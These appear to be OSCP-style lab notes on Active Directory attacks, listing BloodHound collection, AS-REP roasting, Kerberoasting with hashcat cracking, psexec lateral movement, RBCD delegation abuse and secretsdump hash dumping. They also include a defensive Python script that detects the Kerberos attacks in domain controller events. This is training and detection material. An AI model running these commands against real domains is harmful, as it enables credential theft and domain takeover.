🏢 Active Directory Attacks
Common AD attacks used in OSCP-like labs and enterprise environments.
➡️ Environment: See 00_environment_setup
🧠 BloodHound
neo4j console &
bloodhound &
SharpHound.exe -c all -v
Analyze output for shortest path to Domain Admin.
🔐 Kerberos
AS-REP Roasting
GetNPUsers.py -no-pass -dc-ip $IP example.com/ -usersfile users.txt
hashcat -m 18200 hash.txt rockyou.txt
Kerberoasting
GetUserSPNs.py example.com/user:pass -dc-ip $IP
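Defender-side view of the two Kerberos techniques above, as an added example that is not part of the original notes: it flags AS-REP roasting and Kerberoasting patterns in domain controller Security events 4768 and 4769. The sample records are constructed, the `_ev` helper is hypothetical, and the threshold of 3 services within 5 minutes is an assumed tuning value.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype 23, the ticket type hashcat mode 18200 targets

# Constructed sample records (not real logs). Keys follow the EventData field
# names of Windows Security events 4768 (TGT request) and 4769 (service ticket).
def _ev(eid, t, user, ip, etype, **extra):
    return {"EventID": eid, "Time": "2024-05-01T" + t, "TargetUserName": user,
            "IpAddress": ip, "TicketEncryptionType": etype, **extra}

SAMPLE_EVENTS = [
    _ev(4768, "10:00:01", "svc_backup", "10.0.0.50", "0x17", PreAuthType="0"),
    _ev(4768, "10:00:05", "alice", "10.0.0.21", "0x12", PreAuthType="2"),
    _ev(4769, "10:02:00", "bob@EXAMPLE.COM", "10.0.0.50", "0x17", ServiceName="svc_sql"),
    _ev(4769, "10:02:02", "bob@EXAMPLE.COM", "10.0.0.50", "0x17", ServiceName="svc_web"),
    _ev(4769, "10:02:03", "bob@EXAMPLE.COM", "10.0.0.50", "0x17", ServiceName="svc_iis"),
    _ev(4769, "10:03:00", "carol@EXAMPLE.COM", "10.0.0.22", "0x12", ServiceName="svc_sql"),
    _ev(4769, "10:03:10", "dave@EXAMPLE.COM", "10.0.0.23", "0x17", ServiceName="FILESRV01$"),
    _ev(4769, "10:04:00", "erin@EXAMPLE.COM", "10.0.0.24", "0x17", ServiceName="svc_web"),
]

def asrep_candidates(events):
    """4768 events issued without pre-authentication and with an RC4 ticket."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["EventID"] == 4768 and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"] == RC4_HMAC]

def kerberoast_candidates(events, min_services=3, window=timedelta(minutes=5)):
    """Sources requesting RC4 tickets for many distinct user-account SPNs in one window."""
    per_source = defaultdict(list)
    for e in events:
        svc = e.get("ServiceName", "")
        # Skip machine accounts (trailing $) and krbtgt: their keys are not password-derived guesses.
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
                and not svc.endswith("$") and svc.lower() != "krbtgt"):
            per_source[(e["TargetUserName"], e["IpAddress"])].append(
                (datetime.fromisoformat(e["Time"]), svc))
    flagged = {}
    for source, reqs in per_source.items():
        reqs.sort()
        for start, _ in reqs:  # slide a window starting at each request
            services = {s for t, s in reqs if start <= t <= start + window}
            if len(services) >= min_services:
                flagged[source] = sorted(services)
                break
    return flagged

if __name__ == "__main__":
    print(asrep_candidates(SAMPLE_EVENTS), kerberoast_candidates(SAMPLE_EVENTS))
```

Requests answered with AES tickets (0x11/0x12) do not match this filter, so the RC4 check is a starting signal rather than full coverage.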
🧪 Lateral Movement
- SMB relay
- PSExec
impacket-psexec user:pass@$IP
🧪 RBCD (Resource-Based Constrained Delegation)
- Add the compromised user to a computer object's delegation rights
- Use addcomputer.py and the s4u2proxy attack with impacket
🧪 Dumping Hashes
secretsdump.py -just-dc user:pass@$IP
Next: 07_post_exploitation